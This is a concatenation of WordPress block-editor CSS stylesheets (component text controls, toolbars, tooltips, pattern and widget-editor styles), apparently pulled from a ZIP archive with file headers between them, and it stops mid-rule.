.components-text-control__input:focus,.components-text-control__input[type=color]:focus,.components-text-control__input[type=date]:focus,.components-text-control__input[type=datetime-local]:focus,.components-text-control__input[type=datetime]:focus,.components-text-control__input[type=email]:focus,.components-text-control__input[type=month]:focus,.components-text-control__input[type=number]:focus,.components-text-control__input[type=password]:focus,.components-text-control__input[type=tel]:focus,.components-text-control__input[type=text]:focus,.components-text-control__input[type=time]:focus,.components-text-control__input[type=url]:focus,.components-text-control__input[type=week]:focus{ border-color:var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9)); box-shadow:0 0 0 .5px var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9)); outline:2px solid #0000; } .components-text-control__input::-webkit-input-placeholder,.components-text-control__input[type=color]::-webkit-input-placeholder,.components-text-control__input[type=date]::-webkit-input-placeholder,.components-text-control__input[type=datetime-local]::-webkit-input-placeholder,.components-text-control__input[type=datetime]::-webkit-input-placeholder,.components-text-control__input[type=email]::-webkit-input-placeholder,.components-text-control__input[type=month]::-webkit-input-placeholder,.components-text-control__input[type=number]::-webkit-input-placeholder,.components-text-control__input[type=password]::-webkit-input-placeholder,.components-text-control__input[type=tel]::-webkit-input-placeholder,.components-text-control__input[type=text]::-webkit-input-placeholder,.components-text-control__input[type=time]::-webkit-input-placeholder,.components-text-control__input[type=url]::-webkit-input-placeholder,.components-text-control__input[type=week]::-webkit-input-placeholder{ color:#1e1e1e9e; } .components-text-control__input::-moz-placeholder,.components-text-control__input[type=color]::-moz-placeholder,.components-text-control__input[type=date]::-moz-placeholder,.components-text-control__input[type=datetime-local]::-moz-placeholder,.components-text-control__input[type=datetime]::-moz-placeholder,.components-text-control__input[type=email]::-moz-placeholder,.components-text-control__input[type=month]::-moz-placeholder,.components-text-control__input[type=number]::-moz-placeholder,.components-text-control__input[type=password]::-moz-placeholder,.components-text-control__input[type=tel]::-moz-placeholder,.components-text-control__input[type=text]::-moz-placeholder,.components-text-control__input[type=time]::-moz-placeholder,.components-text-control__input[type=url]::-moz-placeholder,.components-text-control__input[type=week]::-moz-placeholder{ color:#1e1e1e9e; } .components-text-control__input:-ms-input-placeholder,.components-text-control__input[type=color]:-ms-input-placeholder,.components-text-control__input[type=date]:-ms-input-placeholder,.components-text-control__input[type=datetime-local]:-ms-input-placeholder,.components-text-control__input[type=datetime]:-ms-input-placeholder,.components-text-control__input[type=email]:-ms-input-placeholder,.components-text-control__input[type=month]:-ms-input-placeholder,.components-text-control__input[type=number]:-ms-input-placeholder,.components-text-control__input[type=password]:-ms-input-placeholder,.components-text-control__input[type=tel]:-ms-input-placeholder,.components-text-control__input[type=text]:-ms-input-placeholder,.components-text-control__input[type=time]:-ms-input-placeholder,.components-text-control__input[type=url]:-ms-input-placeholder,.components-text-control__input[type=week]:-ms-input-placeholder{ color:#1e1e1e9e; } .components-text-control__input,.components-text-control__input[type=color],.components-text-control__input[type=date],.components-text-control__input[type=datetime-local],.components-text-control__input[type=datetime],.components-text-control__input[type=email],.components-text-control__input[type=month],.components-text-control__input[type=number],.components-text-control__input[type=password],.components-text-control__input[type=tel],.components-text-control__input[type=text],.components-text-control__input[type=time],.components-text-control__input[type=url],.components-text-control__input[type=week]{ border-color:var(--wp-components-color-gray-600, #949494); } .components-text-control__input::placeholder,.components-text-control__input[type=color]::placeholder,.components-text-control__input[type=date]::placeholder,.components-text-control__input[type=datetime-local]::placeholder,.components-text-control__input[type=datetime]::placeholder,.components-text-control__input[type=email]::placeholder,.components-text-control__input[type=month]::placeholder,.components-text-control__input[type=number]::placeholder,.components-text-control__input[type=password]::placeholder,.components-text-control__input[type=tel]::placeholder,.components-text-control__input[type=text]::placeholder,.components-text-control__input[type=time]::placeholder,.components-text-control__input[type=url]::placeholder,.components-text-control__input[type=week]::placeholder{ color:color-mix(in srgb, var(--wp-components-color-foreground, #1e1e1e), #0000 38%); } .components-text-control__input.is-next-40px-default-size,.components-text-control__input[type=color].is-next-40px-default-size,.components-text-control__input[type=date].is-next-40px-default-size,.components-text-control__input[type=datetime-local].is-next-40px-default-size,.components-text-control__input[type=datetime].is-next-40px-default-size,.components-text-control__input[type=email].is-next-40px-default-size,.components-text-control__input[type=month].is-next-40px-default-size,.components-text-control__input[type=number].is-next-40px-default-size,.components-text-control__input[type=password].is-next-40px-default-size,.components-text-control__input[type=tel].is-next-40px-default-size,.components-text-control__input[type=text].is-next-40px-default-size,.components-text-control__input[type=time].is-next-40px-default-size,.components-text-control__input[type=url].is-next-40px-default-size,.components-text-control__input[type=week].is-next-40px-default-size{ height:40px; padding-left:12px; padding-right:12px; } .components-text-control__input[type=email],.components-text-control__input[type=url]{ direction:ltr; } .components-tip{ color:#757575; display:flex; } .components-tip svg{ align-self:center; fill:#f0b849; flex-shrink:0; margin-right:16px; } .components-tip p{ margin:0; } .components-toggle-control__label{ line-height:16px; } .components-toggle-control__label:not(.is-disabled){ cursor:pointer; } .components-toggle-control__help{ display:inline-block; margin-inline-start:40px; } .components-accessible-toolbar{ border:1px solid var(--wp-components-color-foreground, #1e1e1e); border-radius:2px; display:inline-flex; flex-shrink:0; } .components-accessible-toolbar>.components-toolbar-group:last-child{ border-right:none; } .components-accessible-toolbar.is-unstyled{ border:none; } .components-accessible-toolbar.is-unstyled>.components-toolbar-group{ border-right:none; } .components-accessible-toolbar[aria-orientation=vertical],.components-toolbar[aria-orientation=vertical]{ align-items:center; display:flex; flex-direction:column; } .components-accessible-toolbar .components-button,.components-toolbar .components-button{ height:48px; padding-left:16px; padding-right:16px; position:relative; z-index:1; } .components-accessible-toolbar .components-button:focus:not(:disabled),.components-toolbar .components-button:focus:not(:disabled){ box-shadow:none; outline:none; } .components-accessible-toolbar .components-button:before,.components-toolbar .components-button:before{ border-radius:2px; content:""; display:block; height:32px; left:8px; position:absolute; right:8px; z-index:-1; } @media not (prefers-reduced-motion){ .components-accessible-toolbar .components-button:before,.components-toolbar .components-button:before{ animation:components-button__appear-animation .1s ease; animation-fill-mode:forwards; } } .components-accessible-toolbar .components-button svg,.components-toolbar .components-button svg{ margin-left:auto; margin-right:auto; position:relative; } .components-accessible-toolbar .components-button.is-pressed,.components-accessible-toolbar .components-button.is-pressed:hover,.components-toolbar .components-button.is-pressed,.components-toolbar .components-button.is-pressed:hover{ background:#0000; } .components-accessible-toolbar .components-button.is-pressed:before,.components-toolbar .components-button.is-pressed:before{ background:var(--wp-components-color-foreground, #1e1e1e); } .components-accessible-toolbar .components-button:focus:before,.components-toolbar .components-button:focus:before{ box-shadow:inset 0 0 0 1px #fff, 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color); outline:2px solid #0000; } .components-accessible-toolbar .components-button.has-icon.has-icon,.components-toolbar .components-button.has-icon.has-icon{ min-width:48px; padding-left:8px; padding-right:8px; } @keyframes components-button__appear-animation{ 0%{ transform:scaleY(0); } to{ transform:scaleY(1); } } .components-toolbar__control.components-button{ position:relative; } .components-toolbar__control.components-button[data-subscript] svg{ padding:5px 10px 5px 0; } .components-toolbar__control.components-button[data-subscript]:after{ bottom:10px; content:attr(data-subscript); font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; font-size:13px; font-weight:600; line-height:12px; position:absolute; right:8px; } .components-toolbar__control.components-button:not(:disabled).is-pressed[data-subscript]:after{ color:#fff; } .components-toolbar-group{ background-color:var(--wp-components-color-background, #fff); border-right:1px solid var(--wp-components-color-foreground, #1e1e1e); display:inline-flex; flex-shrink:0; flex-wrap:wrap; min-height:48px; padding-left:6px; padding-right:6px; } .components-toolbar-group .components-toolbar-group.components-toolbar-group{ border-width:0; margin:0; } .components-toolbar-group{ line-height:0; } .components-toolbar-group .components-button.components-button,.components-toolbar-group .components-button.has-icon.has-icon{ justify-content:center; min-width:36px; padding-left:6px; padding-right:6px; } .components-toolbar-group .components-button.components-button svg,.components-toolbar-group .components-button.has-icon.has-icon svg{ min-width:24px; } .components-toolbar-group .components-button.components-button:before,.components-toolbar-group .components-button.has-icon.has-icon:before{ left:2px; right:2px; } .components-toolbar{ background-color:var(--wp-components-color-background, #fff); border:1px solid var(--wp-components-color-foreground, #1e1e1e); display:inline-flex; flex-shrink:0; flex-wrap:wrap; margin:0; min-height:48px; } .components-toolbar .components-toolbar.components-toolbar{ border-width:0; margin:0; } div.components-toolbar>div{ display:flex; margin:0; } div.components-toolbar>div+div.has-left-divider{ margin-left:6px; overflow:visible; position:relative; } div.components-toolbar>div+div.has-left-divider:before{ background-color:#ddd; box-sizing:initial; content:""; display:inline-block; height:20px; left:-3px; position:absolute; top:8px; width:1px; } .components-tooltip{ background:#000; border-radius:2px; box-shadow:0 1px 2px #0000000d,0 2px 3px #0000000a,0 6px 6px #00000008,0 8px 8px #00000005; color:#f0f0f0; font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; font-size:12px; line-height:1.4; padding:4px 8px; text-align:center; z-index:1000002; } .components-tooltip__shortcut{ margin-left:8px; } .components-validated-control:has(:is(input,select):user-invalid) .components-input-control__backdrop{ --wp-components-color-accent:#cc1818; border-color:#cc1818; } .components-validated-control :is(textarea,input[type=text]):user-invalid{ --wp-admin-theme-color:#cc1818; --wp-components-color-accent:#cc1818; border-color:#cc1818; } .components-validated-control .components-combobox-control__suggestions-container:has(input:user-invalid):not(:has([aria-expanded=true])){ border-color:#cc1818; } .components-validated-control__wrapper-with-error-delegate{ position:relative; } .components-validated-control__wrapper-with-error-delegate:has(select:user-invalid) .components-input-control__backdrop{ --wp-components-color-accent:#cc1818; border-color:#cc1818; } .components-validated-control__wrapper-with-error-delegate:has(input[type=radio]:invalid){ --wp-components-color-accent:#cc1818; } .components-validated-control__wrapper-with-error-delegate:has(input:user-invalid) .components-form-token-field__input-container:not(:has([aria-expanded=true])){ --wp-components-color-accent:#cc1818; border-color:#cc1818; } .components-validated-control__error-delegate{ height:100%; opacity:0; pointer-events:none; position:absolute; top:0; width:100%; } .components-validated-control__indicator{ align-items:flex-start; animation:components-validated-control__indicator-jump .2s cubic-bezier(.68, -.55, .27, 1.55); color:var(--wp-components-color-gray-700, #757575); display:flex; font-family:-apple-system,"system-ui",Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; font-size:.75rem; gap:4px; line-height:16px; margin:8px 0 0; } .components-validated-control__indicator.is-invalid{ color:#cc1818; } .components-validated-control__indicator.is-valid{ color:color-mix(in srgb, #000 30%, #4ab866); } .components-validated-control__indicator-icon{ flex-shrink:0; } .components-validated-control__indicator-spinner{ height:12px; margin:2px; width:12px; } @keyframes components-validated-control__indicator-jump{ 0%{ opacity:0; transform:translateY(-4px); } to{ opacity:1; transform:translateY(0); } } :root{ --wp-admin-theme-color:#3858e9; --wp-admin-theme-color--rgb:56, 88, 233; --wp-admin-theme-color-darker-10:#2145e6; --wp-admin-theme-color-darker-10--rgb:33.0384615385, 68.7307692308, 230.4615384615; --wp-admin-theme-color-darker-20:#183ad6; --wp-admin-theme-color-darker-20--rgb:23.6923076923, 58.1538461538, 214.3076923077; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ :root{ --wp-admin-border-width-focus:1.5px; } }PK!G,dist/patterns/style-rtl.cssnuȯ:root{ --wp-block-synced-color:#7a00df; --wp-block-synced-color--rgb:122, 0, 223; --wp-bound-block-color:var(--wp-block-synced-color); --wp-editor-canvas-background:#ddd; --wp-admin-theme-color:#007cba; --wp-admin-theme-color--rgb:0, 124, 186; --wp-admin-theme-color-darker-10:#006ba1; --wp-admin-theme-color-darker-10--rgb:0, 107, 160.5; --wp-admin-theme-color-darker-20:#005a87; --wp-admin-theme-color-darker-20--rgb:0, 90, 135; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ :root{ --wp-admin-border-width-focus:1.5px; } } .patterns-menu-items__convert-modal{ z-index:1000001; } .patterns-menu-items__convert-modal [role=dialog]>[role=document]{ width:350px; } .patterns-menu-items__convert-modal .patterns-menu-items__convert-modal-categories{ position:relative; } .patterns-menu-items__convert-modal .components-form-token-field__suggestions-list:not(:empty){ background-color:#fff; border:1px solid var(--wp-admin-theme-color); border-bottom-left-radius:2px; border-bottom-right-radius:2px; box-shadow:0 0 .5px .5px var(--wp-admin-theme-color); box-sizing:border-box; max-height:96px; min-width:auto; position:absolute; right:-1px; width:calc(100% + 2px); z-index:1; } .patterns-create-modal__name-input input[type=text]{ margin:0; } .patterns-rename-pattern-category-modal__validation-message{ color:#cc1818; } @media (min-width:782px){ .patterns-rename-pattern-category-modal__validation-message{ width:320px; } } .pattern-overrides-control__allow-overrides-button{ justify-content:center; width:100%; } .patterns-pattern-overrides-toolbar-indicator__popover .components-popover__content{ min-width:260px; padding:16px; } .patterns-pattern-overrides-toolbar-indicator .patterns-pattern-overrides-toolbar-indicator-icon.has-colors svg{ fill:var(--wp-block-synced-color); } .editor-collapsible-block-toolbar .patterns-pattern-overrides-toolbar-indicator{ height:32px; }PK! dist/patterns/style.cssnuȯ:root{ --wp-block-synced-color:#7a00df; --wp-block-synced-color--rgb:122, 0, 223; --wp-bound-block-color:var(--wp-block-synced-color); --wp-editor-canvas-background:#ddd; --wp-admin-theme-color:#007cba; --wp-admin-theme-color--rgb:0, 124, 186; --wp-admin-theme-color-darker-10:#006ba1; --wp-admin-theme-color-darker-10--rgb:0, 107, 160.5; --wp-admin-theme-color-darker-20:#005a87; --wp-admin-theme-color-darker-20--rgb:0, 90, 135; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ :root{ --wp-admin-border-width-focus:1.5px; } } .patterns-menu-items__convert-modal{ z-index:1000001; } .patterns-menu-items__convert-modal [role=dialog]>[role=document]{ width:350px; } .patterns-menu-items__convert-modal .patterns-menu-items__convert-modal-categories{ position:relative; } .patterns-menu-items__convert-modal .components-form-token-field__suggestions-list:not(:empty){ background-color:#fff; border:1px solid var(--wp-admin-theme-color); border-bottom-left-radius:2px; border-bottom-right-radius:2px; box-shadow:0 0 .5px .5px var(--wp-admin-theme-color); box-sizing:border-box; left:-1px; max-height:96px; min-width:auto; position:absolute; width:calc(100% + 2px); z-index:1; } .patterns-create-modal__name-input input[type=text]{ margin:0; } .patterns-rename-pattern-category-modal__validation-message{ color:#cc1818; } @media (min-width:782px){ .patterns-rename-pattern-category-modal__validation-message{ width:320px; } } .pattern-overrides-control__allow-overrides-button{ justify-content:center; width:100%; } .patterns-pattern-overrides-toolbar-indicator__popover .components-popover__content{ min-width:260px; padding:16px; } .patterns-pattern-overrides-toolbar-indicator .patterns-pattern-overrides-toolbar-indicator-icon.has-colors svg{ fill:var(--wp-block-synced-color); } .editor-collapsible-block-toolbar .patterns-pattern-overrides-toolbar-indicator{ height:32px; }PK!-dist/patterns/style-rtl.min.cssnuȯ:root{--wp-block-synced-color:#7a00df;--wp-block-synced-color--rgb:122,0,223;--wp-bound-block-color:var(--wp-block-synced-color);--wp-editor-canvas-background:#ddd;--wp-admin-theme-color:#007cba;--wp-admin-theme-color--rgb:0,124,186;--wp-admin-theme-color-darker-10:#006ba1;--wp-admin-theme-color-darker-10--rgb:0,107,160.5;--wp-admin-theme-color-darker-20:#005a87;--wp-admin-theme-color-darker-20--rgb:0,90,135;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){:root{--wp-admin-border-width-focus:1.5px}}.patterns-menu-items__convert-modal{z-index:1000001}.patterns-menu-items__convert-modal [role=dialog]>[role=document]{width:350px}.patterns-menu-items__convert-modal .patterns-menu-items__convert-modal-categories{position:relative}.patterns-menu-items__convert-modal .components-form-token-field__suggestions-list:not(:empty){background-color:#fff;border:1px solid var(--wp-admin-theme-color);border-bottom-left-radius:2px;border-bottom-right-radius:2px;box-shadow:0 0 .5px .5px var(--wp-admin-theme-color);box-sizing:border-box;max-height:96px;min-width:auto;position:absolute;right:-1px;width:calc(100% + 2px);z-index:1}.patterns-create-modal__name-input input[type=text]{margin:0}.patterns-rename-pattern-category-modal__validation-message{color:#cc1818}@media (min-width:782px){.patterns-rename-pattern-category-modal__validation-message{width:320px}}.pattern-overrides-control__allow-overrides-button{justify-content:center;width:100%}.patterns-pattern-overrides-toolbar-indicator__popover .components-popover__content{min-width:260px;padding:16px}.patterns-pattern-overrides-toolbar-indicator .patterns-pattern-overrides-toolbar-indicator-icon.has-colors svg{fill:var(--wp-block-synced-color)}.editor-collapsible-block-toolbar .patterns-pattern-overrides-toolbar-indicator{height:32px}PK!e@<*dist/patterns/style.min.cssnuȯ:root{--wp-block-synced-color:#7a00df;--wp-block-synced-color--rgb:122,0,223;--wp-bound-block-color:var(--wp-block-synced-color);--wp-editor-canvas-background:#ddd;--wp-admin-theme-color:#007cba;--wp-admin-theme-color--rgb:0,124,186;--wp-admin-theme-color-darker-10:#006ba1;--wp-admin-theme-color-darker-10--rgb:0,107,160.5;--wp-admin-theme-color-darker-20:#005a87;--wp-admin-theme-color-darker-20--rgb:0,90,135;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){:root{--wp-admin-border-width-focus:1.5px}}.patterns-menu-items__convert-modal{z-index:1000001}.patterns-menu-items__convert-modal [role=dialog]>[role=document]{width:350px}.patterns-menu-items__convert-modal .patterns-menu-items__convert-modal-categories{position:relative}.patterns-menu-items__convert-modal .components-form-token-field__suggestions-list:not(:empty){background-color:#fff;border:1px solid var(--wp-admin-theme-color);border-bottom-left-radius:2px;border-bottom-right-radius:2px;box-shadow:0 0 .5px .5px var(--wp-admin-theme-color);box-sizing:border-box;left:-1px;max-height:96px;min-width:auto;position:absolute;width:calc(100% + 2px);z-index:1}.patterns-create-modal__name-input input[type=text]{margin:0}.patterns-rename-pattern-category-modal__validation-message{color:#cc1818}@media (min-width:782px){.patterns-rename-pattern-category-modal__validation-message{width:320px}}.pattern-overrides-control__allow-overrides-button{justify-content:center;width:100%}.patterns-pattern-overrides-toolbar-indicator__popover .components-popover__content{min-width:260px;padding:16px}.patterns-pattern-overrides-toolbar-indicator .patterns-pattern-overrides-toolbar-indicator-icon.has-colors svg{fill:var(--wp-block-synced-color)}.editor-collapsible-block-toolbar .patterns-pattern-overrides-toolbar-indicator{height:32px}PK!N[N[dist/edit-widgets/style.min.cssnuȯ:root{--wp-block-synced-color:#7a00df;--wp-block-synced-color--rgb:122,0,223;--wp-bound-block-color:var(--wp-block-synced-color);--wp-editor-canvas-background:#ddd;--wp-admin-theme-color:#007cba;--wp-admin-theme-color--rgb:0,124,186;--wp-admin-theme-color-darker-10:#006ba1;--wp-admin-theme-color-darker-10--rgb:0,107,160.5;--wp-admin-theme-color-darker-20:#005a87;--wp-admin-theme-color-darker-20--rgb:0,90,135;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){:root{--wp-admin-border-width-focus:1.5px}}.admin-ui-page{background-color:#fff;color:#2f2f2f;container:admin-ui-page/inline-size;display:flex;flex-flow:column;height:100%;position:relative;z-index:1}@media not (prefers-reduced-motion){.admin-ui-page{transition:width .2s ease-out}}.admin-ui-page__header{background:#fff;border-bottom:1px solid #f0f0f0;padding:16px 48px;position:sticky;top:0}@container (max-width: 430px){.admin-ui-page__header{padding:16px 24px}}.admin-ui-page__header-subtitle{color:#757575;font-family:-apple-system,"system-ui",Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:13px;font-weight:400;line-height:20px;margin:0;padding-block-end:8px}.admin-ui-page__content{display:flex;flex-direction:column;flex-grow:1;overflow:auto}.admin-ui-page__content.has-padding{padding:16px 20px}@container (max-width: 430px){.admin-ui-page__content.has-padding{padding:16px 24px}}.show-icon-labels .admin-ui-page__header-actions .components-button.has-icon{padding:0 8px;width:auto}.show-icon-labels .admin-ui-page__header-actions .components-button.has-icon svg{display:none}.show-icon-labels .admin-ui-page__header-actions .components-button.has-icon:after{content:attr(aria-label);font-size:12px}.interface-complementary-area-header{background:#fff;gap:4px;padding-right:8px}.interface-complementary-area-header .interface-complementary-area-header__title{margin:0 auto 0 0}.interface-complementary-area{background:#fff;color:#1e1e1e;height:100%;overflow:auto}@media (min-width:600px){.interface-complementary-area{-webkit-overflow-scrolling:touch}}@media (min-width:782px){.interface-complementary-area{width:280px}}.interface-complementary-area .components-panel{border:none;position:relative;z-index:0}.interface-complementary-area .components-panel__header{position:sticky;top:0;z-index:1}.interface-complementary-area .components-panel__header.editor-sidebar__panel-tabs{top:0}.interface-complementary-area p:not(.components-base-control__help,.components-form-token-field__help){margin-top:0}.interface-complementary-area h2{color:#1e1e1e;font-size:13px;font-weight:500;margin-bottom:1.5em}.interface-complementary-area h3{color:#1e1e1e;font-size:11px;font-weight:500;margin-bottom:1.5em;text-transform:uppercase}.interface-complementary-area hr{border-bottom:1px solid #f0f0f0;border-top:none;margin:1.5em 0}.interface-complementary-area div.components-toolbar,.interface-complementary-area div.components-toolbar-group{box-shadow:none;margin-bottom:1.5em}.interface-complementary-area div.components-toolbar-group:last-child,.interface-complementary-area div.components-toolbar:last-child{margin-bottom:0}.interface-complementary-area .block-editor-skip-to-selected-block:focus{bottom:10px;left:auto;right:10px;top:auto}.interface-complementary-area__fill{height:100%}@media (min-width:782px){body.js.is-fullscreen-mode{height:calc(100% + 32px);margin-top:-32px}body.js.is-fullscreen-mode #adminmenumain,body.js.is-fullscreen-mode #wpadminbar{display:none}body.js.is-fullscreen-mode #wpcontent,body.js.is-fullscreen-mode #wpfooter{margin-left:0}}html.interface-interface-skeleton__html-container{position:fixed;width:100%}@media (min-width:782px){html.interface-interface-skeleton__html-container:not(:has(.is-zoom-out)){position:static;width:auto}}.interface-interface-skeleton{bottom:0;display:flex;flex-direction:row;height:auto;max-height:100%;position:fixed;right:0;top:46px}@media (min-width:783px){.interface-interface-skeleton{top:32px}.is-fullscreen-mode .interface-interface-skeleton{top:0}}.interface-interface-skeleton__editor{display:flex;flex:0 1 100%;flex-direction:column;overflow:hidden}.interface-interface-skeleton{left:0}@media (min-width:783px){.interface-interface-skeleton{left:160px}}@media (min-width:783px){.auto-fold .interface-interface-skeleton{left:36px}}@media (min-width:961px){.auto-fold .interface-interface-skeleton{left:160px}}.folded .interface-interface-skeleton{left:0}@media (min-width:783px){.folded .interface-interface-skeleton{left:36px}}body.is-fullscreen-mode .interface-interface-skeleton{left:0!important}.interface-interface-skeleton__body{display:flex;flex-grow:1;overflow:auto;overscroll-behavior-y:none;position:relative}@media (min-width:782px){.has-footer .interface-interface-skeleton__body{padding-bottom:25px}}.interface-interface-skeleton__content{display:flex;flex-direction:column;flex-grow:1;overflow:auto;z-index:20}@media (min-width:782px){.interface-interface-skeleton__content{z-index:auto}}.interface-interface-skeleton__secondary-sidebar,.interface-interface-skeleton__sidebar{background:#fff;bottom:0;color:#1e1e1e;flex-shrink:0;left:0;position:absolute;top:0;width:auto;z-index:100000}@media (min-width:782px){.interface-interface-skeleton__secondary-sidebar,.interface-interface-skeleton__sidebar{position:relative!important}}.interface-interface-skeleton__sidebar{border-top:1px solid #e0e0e0;overflow:hidden}@media (min-width:782px){.interface-interface-skeleton__sidebar{box-shadow:-1px 0 0 0 rgba(0,0,0,.133);outline:1px solid #0000}}.interface-interface-skeleton__secondary-sidebar{border-top:1px solid #e0e0e0;right:0}@media (min-width:782px){.interface-interface-skeleton__secondary-sidebar{box-shadow:1px 0 0 0 rgba(0,0,0,.133);outline:1px solid #0000}}.interface-interface-skeleton__header{box-shadow:0 1px 0 0 rgba(0,0,0,.133);color:#1e1e1e;flex-shrink:0;height:auto;outline:1px solid #0000;z-index:30}.interface-interface-skeleton__footer{background-color:#fff;border-top:1px solid #e0e0e0;bottom:0;color:#1e1e1e;display:none;flex-shrink:0;height:auto;left:0;position:absolute;width:100%;z-index:90}@media (min-width:782px){.interface-interface-skeleton__footer{display:flex}}.interface-interface-skeleton__footer .block-editor-block-breadcrumb{align-items:center;background:#fff;display:flex;font-size:13px;height:24px;padding:0 18px;z-index:30}.interface-interface-skeleton__actions{background:#fff;bottom:auto;color:#1e1e1e;left:auto;position:fixed!important;right:0;top:-9999em;width:100vw;z-index:100000}@media (min-width:782px){.interface-interface-skeleton__actions{width:280px}}.interface-interface-skeleton__actions:focus,.interface-interface-skeleton__actions:focus-within{bottom:0;top:auto}.is-entity-save-view-open .interface-interface-skeleton__actions:focus,.is-entity-save-view-open .interface-interface-skeleton__actions:focus-within{top:46px}@media (min-width:782px){.is-entity-save-view-open .interface-interface-skeleton__actions:focus,.is-entity-save-view-open .interface-interface-skeleton__actions:focus-within{border-left:1px solid #ddd;top:32px}.is-fullscreen-mode .is-entity-save-view-open .interface-interface-skeleton__actions:focus,.is-fullscreen-mode .is-entity-save-view-open .interface-interface-skeleton__actions:focus-within{top:0}}.interface-pinned-items{display:flex}.interface-pinned-items .components-button{display:none;margin:0}.interface-pinned-items .components-button[aria-controls="edit-post:block"],.interface-pinned-items .components-button[aria-controls="edit-post:document"],.interface-pinned-items .components-button[aria-controls="edit-site:block-inspector"],.interface-pinned-items .components-button[aria-controls="edit-site:template"]{display:flex}.interface-pinned-items .components-button svg{max-height:24px;max-width:24px}@media (min-width:600px){.interface-pinned-items .components-button{display:flex}}.interface-pinned-items{gap:8px}.wp-block[data-type="core/widget-area"]{margin-left:auto;margin-right:auto;max-width:700px}.wp-block[data-type="core/widget-area"] .components-panel__body>.components-panel__body-title{background:#fff;font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;height:48px;margin:0;position:relative;transform:translateZ(0);z-index:1}.wp-block[data-type="core/widget-area"] .components-panel__body>.components-panel__body-title:hover{background:#fff}.wp-block[data-type="core/widget-area"] .block-list-appender.wp-block{position:relative;width:auto}.wp-block[data-type="core/widget-area"] .editor-styles-wrapper .wp-block.wp-block.wp-block.wp-block.wp-block{max-width:100%}.wp-block[data-type="core/widget-area"] .components-panel__body.is-opened{padding:0}.blocks-widgets-container .wp-block-widget-area__inner-blocks.editor-styles-wrapper{margin:0;padding:0}.blocks-widgets-container .wp-block-widget-area__inner-blocks.editor-styles-wrapper>.block-editor-block-list__layout{margin-top:-48px;min-height:32px;padding:72px 16px 16px}.wp-block-widget-area__highlight-drop-zone{outline:var(--wp-admin-border-width-focus) solid var(--wp-admin-theme-color)}body.is-dragging-components-draggable .wp-block[data-type="core/widget-area"] .components-panel__body>.components-panel__body-title,body.is-dragging-components-draggable .wp-block[data-type="core/widget-area"] .components-panel__body>.components-panel__body-title *{pointer-events:none}.edit-widgets-error-boundary{box-shadow:0 5px 15px #00000014,0 15px 27px #00000012,0 30px 36px #0000000a,0 50px 43px #00000005;margin:64px auto auto;max-width:780px;padding:20px}.edit-widgets-header{align-items:center;background:#fff;display:flex;height:64px;justify-content:space-between;overflow:auto}@media (min-width:600px){.edit-widgets-header{overflow:visible}}.edit-widgets-header .selected-block-tools-wrapper{align-items:center;display:flex;height:64px;overflow:hidden}.edit-widgets-header .selected-block-tools-wrapper .block-editor-block-contextual-toolbar{border-bottom:0;height:100%}.edit-widgets-header .selected-block-tools-wrapper .block-editor-block-toolbar{height:100%;padding-top:17px}.edit-widgets-header .selected-block-tools-wrapper .block-editor-block-toolbar .components-button:not(.block-editor-block-mover-button){height:32px}.edit-widgets-header .selected-block-tools-wrapper .components-toolbar,.edit-widgets-header .selected-block-tools-wrapper .components-toolbar-group{border-right:none}.edit-widgets-header .selected-block-tools-wrapper .components-toolbar-group:after,.edit-widgets-header .selected-block-tools-wrapper .components-toolbar:after{background-color:#ddd;content:"";height:24px;margin-left:8px;margin-top:4px;width:1px}.edit-widgets-header .selected-block-tools-wrapper .components-toolbar .components-toolbar-group.components-toolbar-group:after,.edit-widgets-header .selected-block-tools-wrapper .components-toolbar-group .components-toolbar-group.components-toolbar-group:after{display:none}.edit-widgets-header .selected-block-tools-wrapper .block-editor-block-mover.is-horizontal .block-editor-block-mover-button{height:32px;overflow:visible}@media (min-width:600px){.edit-widgets-header .selected-block-tools-wrapper .block-editor-block-mover:not(.is-horizontal) .block-editor-block-mover__move-button-container{position:relative;top:-10px}}.edit-widgets-header__navigable-toolbar-wrapper{align-items:center;display:flex;flex-shrink:2;height:64px;justify-content:center;overflow:hidden;padding-left:16px;padding-right:8px}.edit-widgets-header__title{font-size:20px;margin:0 20px 0 0;padding:0}.edit-widgets-header__actions{align-items:center;display:flex;padding-right:4px}@media (min-width:600px){.edit-widgets-header__actions{padding-right:8px}}.edit-widgets-header__actions{gap:8px}.edit-widgets-header-toolbar{gap:8px;margin-right:8px}.edit-widgets-header-toolbar>.components-button.has-icon.has-icon.has-icon,.edit-widgets-header-toolbar>.components-dropdown>.components-button.has-icon.has-icon{height:32px;min-width:32px;padding:4px}.edit-widgets-header-toolbar>.components-button.has-icon.has-icon.has-icon.is-pressed,.edit-widgets-header-toolbar>.components-dropdown>.components-button.has-icon.has-icon.is-pressed{background:#1e1e1e}.edit-widgets-header-toolbar>.components-button.has-icon.has-icon.has-icon:focus:not(:disabled),.edit-widgets-header-toolbar>.components-dropdown>.components-button.has-icon.has-icon:focus:not(:disabled){box-shadow:0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color),inset 0 0 0 1px #fff;outline:1px solid #0000}.edit-widgets-header-toolbar>.components-button.has-icon.has-icon.has-icon:before,.edit-widgets-header-toolbar>.components-dropdown>.components-button.has-icon.has-icon:before{display:none}.edit-widgets-header-toolbar__inserter-toggle.edit-widgets-header-toolbar__inserter-toggle{padding-left:8px;padding-right:8px}@media 